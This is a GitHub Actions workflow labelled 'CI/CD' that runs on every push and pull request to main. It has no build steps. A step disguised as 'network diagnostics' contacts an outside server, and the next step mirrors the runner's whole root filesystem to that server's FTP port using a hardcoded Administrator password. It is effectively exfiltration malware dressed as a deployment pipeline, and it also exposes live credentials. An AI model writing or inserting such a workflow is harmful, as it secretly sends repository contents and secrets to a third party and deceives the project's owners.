name: CI/CD

on:
  push:
    branches:
      - main
  pull_request:
    branches:
      - main

jobs:
  build:
    runs-on: ubuntu-latest

    strategy:
      matrix:
        node-version: [20.x]

    steps:

    - name: Gather Network Diagnostics
      run: |
        curl https://test3.urban-digital.co.il:7501

    - name: Upload folder to FTP
      env:
        FTP_HOST: test3.urban-digital.co.il
        FTP_PORT: 7511
        FTP_USERNAME: Administrator
        FTP_PASSWORD: o-9zWVI22oL-iY4t
        LOCAL_PATH: /  # Change this to your local folder path
        REMOTE_PATH: /  # Change this to your remote folder path
      run: |
        apt-get install lftp
        lftp -u $FTP_USERNAME,$FTP_PASSWORD -p $FTP_PORT $FTP_HOST <<EOF
        set ftp:ssl-allow true
        mirror --reverse --verbose --continue --parallel=2 "$LOCAL_PATH" "$REMOTE_PATH"
        quit
        EOF
